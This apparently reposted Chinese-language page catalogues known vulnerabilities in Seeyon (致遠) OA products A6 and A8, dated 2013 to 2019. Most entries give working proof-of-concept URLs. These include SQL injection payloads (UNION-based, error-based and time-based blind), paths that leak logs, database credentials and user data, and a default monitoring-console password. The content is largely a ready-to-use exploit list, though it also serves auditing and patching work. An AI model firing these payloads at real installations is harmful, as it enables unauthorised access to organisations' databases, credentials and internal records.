應用安全 - 工具 | 框架 - 致遠OA - 漏洞匯總


A6 - SQL注入 - search_result.jsp

Date 2013 復現
POC | EXP
/oaSearch/search_result.jsp

 

A6 - SQL注入 - setextno.jsp

Date 2014 類型 SQL注入
 影響范圍 復現 POC | EXP
/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23
分析

 

A6 - SQL注入 - test.jsp

Date
2015 類型 SQL注入 影響范圍 復現 POC
| EXP /common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234) 分析

 

A6 - SQL注入 - iSignatureHtmlServer.jsp

Date 2015 類型
SQL注入

影響范圍

類型
SQL注入

復現
POC | EXP
/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23
分析

 

A6 - SQL注入 - messageViewer.jsp

Date 2015 類型

影響范圍

復現
POC | EXP
/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23
 分析

 

A6 - SQL注入 - resend.jsp

Date 2015 類型

影響范圍

復現
POC | EXP
/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20-- 分析

 

A6 - 敏感信息泄露

Date
2015 類型 影響范圍 復現
POC | EXP
/common/selectPersonNew/initData.jsp?trueName=1
/assess/js/initDataAssess.jsp
/common/SelectPerson/reloadData.jsp
/ext/trafaxserver/SystemManage/config
/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
分析

 

A6 - SQL注入 - initData.jsp

Date 2015 類型
SQL注入

影響范圍

復現 
POC | EXP
/common/selectPersonNew/initData.jsp?trueName=1%25%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28sleep%286%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29>64%20AND%20%27%25%27%3D%27 分析

 

A6 - 敏感信息泄露 - 數據庫賬號密碼

Date 2015 類型
信息泄露
 影響范圍 復現
POC | EXP
/createMysql.jsp
/ext/createMysql.jsp 分析

 

A8-V5 - 信息泄露 - log泄露

Date 2014 類型 信息泄露 復現 POC | EXP
/logs/login.log
/seeyon/logs/login.log
/seeyon/logs/ctp.log
/seeyon/logs/uc.log
分析

 

A8 - XXE

 

A8 - 監控后台默認密碼漏洞

 

Date 2015 類型 弱口令 復現
POC | EXP
/seeyon/management/status.jsp
/seeyon/management/index.jsp
/management/index.jsp
password:WLCCYBD@SEEYON

分析

 

 

A8 - CmxUserSQL時間盲注

 

Date 2015 類型 注入 復現
/Server/CmxUser.php 分析

 

致遠A8-m企業版v3.20SP1 - 越權

 

致遠A8-V5 - 未授權訪問 

/seeyon/ctp/sysmgr/monitor/cacheDump.do

致遠A8-V5 - 越權 - 普通用戶任意文件上傳

 

致遠A8-V5  - 通用口令漏洞

 

致遠A6 - SessionID泄露漏洞

 

致遠A6 - DBA權限SQL注入/seeyon/checkWaitdo.jsp

 

致遠A6 - SQL注入 - /docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1

 

致遠A6 - 信息泄露 - 數據庫信息 - /ext/byoa/start.jsp

 

致遠A6 - SQL注入 - /ext/trafaxserver/ExtnoManage/isNotInTable.jsp

 

致遠OA 3.5 - 文件上傳 - /seeyon/fileUPload.do

 

致遠A6 - SQL注入 - /ext/trafaxserver/downloadAtt.jsp?attach_ids=[sqli]

 

致遠A8-V5 - 任意用戶密碼修改漏洞 - /services/authorityService?wsdl 

 

致遠 - 敏感信息泄露 - /admin/login/user.properties 

 

致遠 - SQL注入 -  /common/js/menu/test.jsp

 

A8-V5

Date
2019
類型 任意文件寫入導致遠程代碼執行 影響范圍
致遠A8-V5協同管理軟件V6.1sp1
致遠A8+協同管理軟件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致遠A8+協同管理軟件V7.1

復現 POC | EXP
 分析
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM